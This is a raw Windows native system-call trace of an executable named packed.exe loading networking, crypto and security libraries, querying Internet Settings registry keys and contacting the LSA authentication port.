 03094   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\mlang.dll"}, 5, 96, ... 364, {status=0x0, info=1}, ) }, 5, 96, ... 364, {status=0x0, info=1}, ) == 0x0
 03095   456   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 364, ... 368, ) == 0x0
 03096   456   NtQuerySection  (368, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 03097   456   NtClose  (364, ... ) == 0x0
 03098   456   NtMapViewOfSection  (368, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x74770000), 0x0, 585728, ) == 0x0
 03099   456   NtClose  (368, ... ) == 0x0
 03100   456   NtQueryDefaultUILanguage  (1234932, ...
 03101   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 03102   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... -2147482028, ) == 0x0
 03103   456   NtQueryInformationToken  (-2147482028, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 03104   456   NtClose  (-2147482028, ... ) == 0x0
 03105   456   NtOpenKey  (0x2000000, {24, 0, 0x640, 0, 0,  (0x2000000, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003"}, ... -2147482028, ) }, ... -2147482028, ) == 0x0
 03106   456   NtOpenKey  (0x80000000, {24, 0, 0x240, 0, 0,  (0x80000000, {24, 0, 0x240, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\Nls\MUILanguages"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03107   456   NtOpenKey  (0x80000000, {24, -2147482028, 0x640, 0, 0,  (0x80000000, {24, -2147482028, 0x640, 0, 0, "Control Panel\Desktop"}, ... -2147482020, ) }, ... -2147482020, ) == 0x0
 03108   456   NtQueryValueKey  (-2147482020,  (-2147482020, "MultiUILanguageId", Partial, 256, ... ) , Partial, 256, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03109   456   NtClose  (-2147482020, ... ) == 0x0
 03110   456   NtClose  (-2147482028, ... ) == 0x0
 03100   456   NtQueryDefaultUILanguage  ... ) == 0x0
 03111   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\Nls\MUILanguages"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03112   456   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\mlang.dll"}, 1, 96, ... 368, {status=0x0, info=1}, ) }, 1, 96, ... 368, {status=0x0, info=1}, ) == 0x0
 03113   456   NtCreateSection  (0x4, 0x0, 0x0, 2, 134217728, 368, ... 364, ) == 0x0
 03114   456   NtMapViewOfSection  (364, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 2, ... (0x1480000), 0x0, 577536, ) == 0x0
 03115   456   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\mlang.dll.123.Manifest"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03116   456   NtQueryDefaultLocale  (1, 1232968, ... ) == 0x0
 03117   456   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\mlang.dll.123.Config"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03118   456   NtRequestWaitReplyPort  (24, {128, 156, new_msg, 0, 1233824, 1, 96, 0}  (24, {128, 156, new_msg, 0, 1233824, 1, 96, 0} "\210\6\31\1\33\0\1\0\0\0\0\0\1\326\22\0\1\0\0\0\0\0\11\4\1\1\1\0:\0<\0\250\6\31\1p\1\0\0\377\377\377\377\0\0\0\0`\26K\1\0\0\0\0\262\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\344\6\31\1\0\0\0\0\0\0\0\0\240\332\22\0\0\0\0\0" ... {128, 156, reply, 0, 452, 456, 1568, 0} " S\26\0\33\0\1\0\0\0\0\0\1\326\22\0\1\0\0\0\0\0\11\4\1\1\1\0:\0<\0\250\6\31\1p\1\0\0\377\377\377\377\0\0\0\0`\26K\1\0\0\0\0\262\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\344\6\31\1\0\0\0\0\0\0\0\0\240\332\22\0\0\0\0\0" )  ... {128, 156, reply, 0, 452, 456, 1568, 0}  (24, {128, 156, new_msg, 0, 1233824, 1, 96, 0} "\210\6\31\1\33\0\1\0\0\0\0\0\1\326\22\0\1\0\0\0\0\0\11\4\1\1\1\0:\0<\0\250\6\31\1p\1\0\0\377\377\377\377\0\0\0\0`\26K\1\0\0\0\0\262\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\344\6\31\1\0\0\0\0\0\0\0\0\240\332\22\0\0\0\0\0" ... {128, 156, reply, 0, 452, 456, 1568, 0} " S\26\0\33\0\1\0\0\0\0\0\1\326\22\0\1\0\0\0\0\0\11\4\1\1\1\0:\0<\0\250\6\31\1p\1\0\0\377\377\377\377\0\0\0\0`\26K\1\0\0\0\0\262\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\344\6\31\1\0\0\0\0\0\0\0\0\240\332\22\0\0\0\0\0" )  ) == 0x0
 03119   456   NtClose  (368, ... ) == 0x0
 03120   456   NtClose  (364, ... ) == 0x0
 03121   456   NtUnmapViewOfSection  (-1, 0x1480000, ... ) == 0x0
 03122   456   NtUnmapViewOfSection  (-1, 0x12daa0, ... ) == STATUS_NOT_MAPPED_VIEW
 03123   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 03124   456   NtOpenKey  (0x8, {24, 0, 0x40, 0, 0,  (0x8, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03125   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 03126   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 03127   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\packed.exe.Local\"}, 1232052, ... ) }, 1232052, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03128   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 03129   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 03130   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 03131   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a"}, 1232644, ... ) }, 1232644, ... ) == 0x0
 03132   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a"}, 3, 33, ... 364, {status=0x0, info=1}, ) }, 3, 33, ... 364, {status=0x0, info=1}, ) == 0x0
 03133   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 03134   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "WININET.dll"}, ... 368, ) }, ... 368, ) == 0x0
 03135   456   NtMapViewOfSection  (368, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x76200000), 0x0, 618496, ) == 0x0
 03136   456   NtClose  (368, ... ) == 0x0
 03137   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "CRYPT32.dll"}, ... 368, ) }, ... 368, ) == 0x0
 03138   456   NtMapViewOfSection  (368, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x762c0000), 0x0, 565248, ) == 0x0
 03139   456   NtClose  (368, ... ) == 0x0
 03140   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "MSASN1.dll"}, ... 368, ) }, ... 368, ) == 0x0
 03141   456   NtMapViewOfSection  (368, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x762a0000), 0x0, 61440, ) == 0x0
 03142   456   NtClose  (368, ... ) == 0x0
 03143   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "SYSTEM\CurrentControlSet\Services\crypt32\Performance"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03144   456   NtAllocateVirtualMemory  (-1, 1470464, 0, 4096, 4096, 4, ... 1470464, 4096, ) == 0x0
 03145   456   NtAllocateVirtualMemory  (-1, 1474560, 0, 4096, 4096, 4, ... 1474560, 4096, ) == 0x0
 03146   456   NtAllocateVirtualMemory  (-1, 1478656, 0, 4096, 4096, 4, ... 1478656, 4096, ) == 0x0
 03147   456   NtAllocateVirtualMemory  (-1, 1482752, 0, 4096, 4096, 4, ... 1482752, 4096, ) == 0x0
 03148   456   NtCreateEvent  (0x1f0003, {24, 64, 0x80, 1236468, 0,  (0x1f0003, {24, 64, 0x80, 1236468, 0, "Global\crypt32LogoffEvent"}, 0, 0, ... ) }, 0, 0, ... ) == STATUS_ACCESS_DENIED
 03149   456   NtOpenEvent  (0x100000, {24, 64, 0x0, 0, 0,  (0x100000, {24, 64, 0x0, 0, 0, "Global\crypt32LogoffEvent"}, ... 368, ) }, ... 368, ) == 0x0
 03150   456   NtAllocateVirtualMemory  (-1, 1486848, 0, 8192, 4096, 4, ... 1486848, 8192, ) == 0x0
 03151   456   NtCreateKey  (0xf003f, {24, 52, 0x40, 0, 0,  (0xf003f, {24, 52, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\P3P\History"}, 0, 0x0, 0, ... 372, 2, ) }, 0, 0x0, 0, ... 372, 2, ) == 0x0
 03152   456   NtQueryDefaultUILanguage  (1234704, ...
 03153   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 03154   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... -2147482028, ) == 0x0
 03155   456   NtQueryInformationToken  (-2147482028, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 03156   456   NtClose  (-2147482028, ... ) == 0x0
 03157   456   NtOpenKey  (0x2000000, {24, 0, 0x640, 0, 0,  (0x2000000, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003"}, ... -2147482028, ) }, ... -2147482028, ) == 0x0
 03158   456   NtOpenKey  (0x80000000, {24, 0, 0x240, 0, 0,  (0x80000000, {24, 0, 0x240, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\Nls\MUILanguages"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03159   456   NtOpenKey  (0x80000000, {24, -2147482028, 0x640, 0, 0,  (0x80000000, {24, -2147482028, 0x640, 0, 0, "Control Panel\Desktop"}, ... -2147482020, ) }, ... -2147482020, ) == 0x0
 03160   456   NtQueryValueKey  (-2147482020,  (-2147482020, "MultiUILanguageId", Partial, 256, ... ) , Partial, 256, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03161   456   NtClose  (-2147482020, ... ) == 0x0
 03162   456   NtClose  (-2147482028, ... ) == 0x0
 03152   456   NtQueryDefaultUILanguage  ... ) == 0x0
 03163   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\Nls\MUILanguages"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03164   456   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\WININET.dll"}, 1, 96, ... 376, {status=0x0, info=1}, ) }, 1, 96, ... 376, {status=0x0, info=1}, ) == 0x0
 03165   456   NtCreateSection  (0x4, 0x0, 0x0, 2, 134217728, 376, ... 380, ) == 0x0
 03166   456   NtMapViewOfSection  (380, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 2, ... (0x1480000), 0x0, 593920, ) == 0x0
 03167   456   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\WININET.dll.123.Manifest"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03168   456   NtQueryDefaultLocale  (1, 1232740, ... ) == 0x0
 03169   456   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\WININET.dll.123.Config"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03170   456   NtRequestWaitReplyPort  (24, {128, 156, new_msg, 0, 1233596, 1, 96, 0}  (24, {128, 156, new_msg, 0, 1233596, 1, 96, 0} "\210\6\31\1\33\0\1\0\0\0\0\0\1\326\22\0\1\0\0\0\0\0\11\4\1\1\1\0>\0@\0\250\6\31\1x\1\0\0\377\377\377\377\0\0\0\0P\275O\1\0\0\0\0\312\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6\31\1\0\0\0\0\0\0\0\0\274\331\22\0\0\0\0\0" ... {128, 156, reply, 0, 452, 456, 1569, 0} " S\26\0\33\0\1\0\0\0\0\0\1\326\22\0\1\0\0\0\0\0\11\4\1\1\1\0>\0@\0\250\6\31\1x\1\0\0\377\377\377\377\0\0\0\0P\275O\1\0\0\0\0\312\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6\31\1\0\0\0\0\0\0\0\0\274\331\22\0\0\0\0\0" )  ... {128, 156, reply, 0, 452, 456, 1569, 0}  (24, {128, 156, new_msg, 0, 1233596, 1, 96, 0} "\210\6\31\1\33\0\1\0\0\0\0\0\1\326\22\0\1\0\0\0\0\0\11\4\1\1\1\0>\0@\0\250\6\31\1x\1\0\0\377\377\377\377\0\0\0\0P\275O\1\0\0\0\0\312\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6\31\1\0\0\0\0\0\0\0\0\274\331\22\0\0\0\0\0" ... {128, 156, reply, 0, 452, 456, 1569, 0} " S\26\0\33\0\1\0\0\0\0\0\1\326\22\0\1\0\0\0\0\0\11\4\1\1\1\0>\0@\0\250\6\31\1x\1\0\0\377\377\377\377\0\0\0\0P\275O\1\0\0\0\0\312\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6\31\1\0\0\0\0\0\0\0\0\274\331\22\0\0\0\0\0" )  ) == 0x0
 03171   456   NtClose  (376, ... ) == 0x0
 03172   456   NtClose  (380, ... ) == 0x0
 03173   456   NtUnmapViewOfSection  (-1, 0x1480000, ... ) == 0x0
 03174   456   NtUnmapViewOfSection  (-1, 0x12d9bc, ... ) == STATUS_NOT_MAPPED_VIEW
 03175   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 03176   456   NtOpenKey  (0x8, {24, 0, 0x40, 0, 0,  (0x8, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03177   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 03178   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 03179   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\packed.exe.Local\"}, 1231280, ... ) }, 1231280, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03180   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 03181   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 03182   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 03183   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a"}, 1231872, ... ) }, 1231872, ... ) == 0x0
 03184   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a"}, 3, 33, ... 380, {status=0x0, info=1}, ) }, 3, 33, ... 380, {status=0x0, info=1}, ) == 0x0
 03185   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 03186   456   NtCreateKey  (0x2001f, {24, 52, 0x40, 0, 0,  (0x2001f, {24, 52, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, 0, 0x0, 0, ... 376, 2, ) }, 0, 0x0, 0, ... 376, 2, ) == 0x0
 03187   456   NtQueryValueKey  (376,  (376, "FromCacheTimeout", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03188   456   NtQueryValueKey  (376,  (376, "SecureProtocols", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03189   456   NtQueryValueKey  (376,  (376, "CertificateRevocation", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03190   456   NtQueryValueKey  (376,  (376, "DisableKeepAlive", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03191   456   NtQueryValueKey  (376,  (376, "DisablePassport", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03192   456   NtQueryValueKey  (376,  (376, "CacheMode", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03193   456   NtQueryValueKey  (376,  (376, "EnableHttp1_1", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (376, "EnableHttp1_1", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 03194   456   NtQueryValueKey  (376,  (376, "ProxyHttp1.1", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03195   456   NtQueryValueKey  (376,  (376, "EnableNegotiate", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (376, "EnableNegotiate", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 03196   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "Secur32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03197   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\Secur32.dll"}, 1235872, ... ) }, 1235872, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03198   456   NtQueryAttributesFile  ({24, 112, 0x40, 0, 0,  ({24, 112, 0x40, 0, 0, "Secur32.dll"}, 1235872, ... ) }, 1235872, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03199   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\Secur32.dll"}, 1235872, ... ) }, 1235872, ... ) == 0x0
 03200   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\Secur32.dll"}, 5, 96, ... 384, {status=0x0, info=1}, ) }, 5, 96, ... 384, {status=0x0, info=1}, ) == 0x0
 03201   456   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 384, ... 388, ) == 0x0
 03202   456   NtQuerySection  (388, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 03203   456   NtClose  (384, ... ) == 0x0
 03204   456   NtMapViewOfSection  (388, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x76f90000), 0x0, 65536, ) == 0x0
 03205   456   NtClose  (388, ... ) == 0x0
 03206   456   NtCreateSemaphore  (0x100003, 0x0, 0, 2147483647, ... 388, ) == 0x0
 03207   456   NtCreateSemaphore  (0x100003, 0x0, 0, 2147483647, ... 384, ) == 0x0
 03208   456   NtOpenEvent  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\SECURITY\LSA_AUTHENTICATION_INITIALIZED"}, ... 392, ) }, ... 392, ) == 0x0
 03209   456   NtQueryEvent  (392, Basic, 8, ... {EventType=0,SignalState=1,}, 0x0, ) == 0x0
 03210   456   NtClose  (392, ... ) == 0x0
 03211   456   NtConnectPort  ( ("\LsaAuthenticationPort", {12, 2, 1, 0}, 0x0, 0x0, 1237356, 140, ... 392, 0x0, 0x0, 256, 140, ) , {12, 2, 1, 0}, 0x0, 0x0, 1237356, 140, ... 392, 0x0, 0x0, 256, 140, ) == 0x0
 03212   456   NtRequestWaitReplyPort  (392, {28, 52, new_msg, 0, 0, 0, 0, 0}  (392, {28, 52, new_msg, 0, 0, 0, 0, 0} "\37\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\1\0\13\30\10\2\230\305\26\0" ... {176, 200, reply, 0, 452, 456, 1571, 0} "\37\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\1\0\20\0\10\2\220\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0S\0R\0I\0-\0u\0s\0e\0r\0" )  ... {176, 200, reply, 0, 452, 456, 1571, 0}  (392, {28, 52, new_msg, 0, 0, 0, 0, 0} "\37\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\1\0\13\30\10\2\230\305\26\0" ... {176, 200, reply, 0, 452, 456, 1571, 0} "\37\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\1\0\20\0\10\2\220\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0S\0R\0I\0-\0u\0s\0e\0r\0" )  ) == 0x0
 03213   456   NtQueryValueKey  (376,  (376, "SyncMode5", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03214   456   NtOpenKey  (0xf, {24, 48, 0x40, 0, 0,  (0xf, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache"}, ... 396, ) }, ... 396, ) == 0x0
 03215   456   NtQueryValueKey  (396,  (396, "FixupKey", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03216   456   NtClose  (396, ... ) == 0x0
 03217   456   NtOpenKey  (0xf, {24, 48, 0x40, 0, 0,  (0xf, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache"}, ... 396, ) }, ... 396, ) == 0x0
 03218   456   NtQueryValueKey  (396,  (396, "SessionStartTimeDefaultDeltaSecs", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03219   456   NtClose  (396, ... ) == 0x0
 03220   456   NtOpenKey  (0xf, {24, 48, 0x40, 0, 0,  (0xf, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache"}, ... 396, ) }, ... 396, ) == 0x0
 03221   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "System\Setup"}, ... 400, ) }, ... 400, ) == 0x0
 03222   456   NtQueryValueKey  (400,  (400, "SystemSetupInProgress", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (400, "SystemSetupInProgress", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 03223   456   NtClose  (400, ... ) == 0x0
 03224   456   NtOpenKey  (0xf, {24, 52, 0x40, 0, 0,  (0xf, {24, 52, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"}, ... 400, ) }, ... 400, ) == 0x0
 03225   456   NtOpenKey  (0xf, {24, 52, 0x40, 0, 0,  (0xf, {24, 52, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache"}, ... 404, ) }, ... 404, ) == 0x0
 03226   456   NtOpenKey  (0xf, {24, 52, 0x40, 0, 0,  (0xf, {24, 52, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"}, ... 408, ) }, ... 408, ) == 0x0
 03227   456   NtOpenKey  (0xf, {24, 52, 0x40, 0, 0,  (0xf, {24, 52, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache"}, ... 412, ) }, ... 412, ) == 0x0
 03228   456   NtQueryValueKey  (412,  (412, "Signature", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0l\0i\0e\0n\0t\0 \0U\0r\0l\0C\0a\0c\0h\0e\0 \0M\0M\0F\0 \0V\0e\0r\0 \05\0.\02\0\0\0"}, 68, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (412, "Signature", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0l\0i\0e\0n\0t\0 \0U\0r\0l\0C\0a\0c\0h\0e\0 \0M\0M\0F\0 \0V\0e\0r\0 \05\0.\02\0\0\0"}, 68, ) }, 68, ) == 0x0
 03229   456   NtQueryValueKey  (412,  (412, "Signature", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0l\0i\0e\0n\0t\0 \0U\0r\0l\0C\0a\0c\0h\0e\0 \0M\0M\0F\0 \0V\0e\0r\0 \05\0.\02\0\0\0"}, 68, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (412, "Signature", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0l\0i\0e\0n\0t\0 \0U\0r\0l\0C\0a\0c\0h\0e\0 \0M\0M\0F\0 \0V\0e\0r\0 \05\0.\02\0\0\0"}, 68, ) }, 68, ) == 0x0
 03230   456   NtClose  (412, ... ) == 0x0
 03231   456   NtOpenKey  (0xf, {24, 52, 0x40, 0, 0,  (0xf, {24, 52, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"}, ... 412, ) }, ... 412, ) == 0x0
